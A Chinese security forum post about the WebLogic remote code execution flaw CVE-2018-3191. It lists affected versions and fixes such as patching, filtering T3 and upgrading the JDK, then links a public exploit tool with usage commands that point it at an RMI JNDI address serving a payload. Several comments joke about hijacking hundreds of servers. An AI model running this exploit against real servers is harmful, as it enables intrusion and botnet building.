一大波肉鸡在路上!CVE-2018-3191已被灰产做成批量攻击工具
CVE-2018-3191已被灰产做成批量攻击工具
1.1背景
北京时间10月17日,Oracle官方发布的10月关键补丁更新CPU(重要补丁更新)中修复了一个高危的WebLogic远程代码执行漏洞(CVE-2018-3191)。该漏洞允许未经身份验证的攻击网络服务器被攻击者接受,从而造成远程代码执行。这个漏洞由Matthias Kaiser,loopx9,李正东申报通过T3协议网络访问并破坏易受攻击的WebLogic Server,成功的漏洞利用可导致。
有人已经复现成功
而且发现已经被灰产写成批量入侵工具,还在服务器上跑着呢!
所以呢,有一大波肉鸡在路上,如果你不想成为肉鸡,尽快修复!
1.2漏洞编号
CVE-2018-3191
1.3漏洞等级
高危
二、修复建议
2.1受影响版本
WebLogic 10.3.6.0
WebLogic 12.1.3.0
WebLogic 12.2.1.2
WebLogic 12.2.1.3
2.2漏洞检测
检查WebLogic的版本号是否为受影响版本。
检查是否开启了WebLogic的T3服务。
2.3解决方案
Oracle官方已经在本次的关键补丁更新(CPU)中修复了该漏洞,强烈建议受影响的用户尽快升级更新进行防护。
注:Oracle官方补丁需要用户持有正版软件的许可账号,使用该账号登陆https://support.oracle.com后,可以下载最新补丁。
1.过滤T3协议
2.设置Nginx反向代理
3.升级到最新JDK
JEP290(JDK8u121,7u131,6u141)
工具指定要带着的:
https://github.com/voidfyoo/CVE-2018-3191/releases
https://github.com/voidfyoo/CVE-2018-3191
用法:
java -jar weblogic-spring-jndi.jar <jndi_address>
java -jar weblogic-spring-jndi.jar rmi://192.168.1.1:1099/Exp
weblogic-spring-jndi-12.2.1.3.jar 对于weblogic:
12.2.1.3
weblogic-spring-jndi-10.3.6.0.jar 对于weblogic:
10.3.6.0
12.2.1.0
12.1.3.0
12.2.1.1
评论38次
rmi://192.168.1.1:1099/Expexp指的是什么呢?1099端口是不是默认是开放的?
越来越感觉到zoomeye之类的必要性了
感觉shodan的搜索能力也不错
weblogic:又是我?
不会用,没懂rmi怎么搭建
感谢大佬分享
肉鸡够500只了,怎么样不用我多说了吧。
图片生动形象,nice
这个肉鸡很形象了
还是要关注威胁情报
3191这个利用的是rmi的端口?好像不是7001是么?
一大波肉鸡在路上!CVE-2018-3191已被灰产做成批量攻击工具
还是得shodan
利用没有以前那种傻瓜式了,感觉还是灰产的进步快啊 哈哈
感谢分享 每次这种漏洞爆发出发,厂商们又得开始辛苦的补洞了。
所以还是要即时打补丁。感谢分享exp.
据说patch后的版本有性能问题,升级得注意
好啊。抓鸡去。
这图是我的,至少给我个来源啊
不是给了新闻来源了吗
微信好友朋友圈
谢谢老哥了,有工具,良心啊
感谢大佬的分享!!!
这图是我的,至少给我个来源啊
图中指的是哪个圈子啊?给个加入二维码呗,谢谢大佬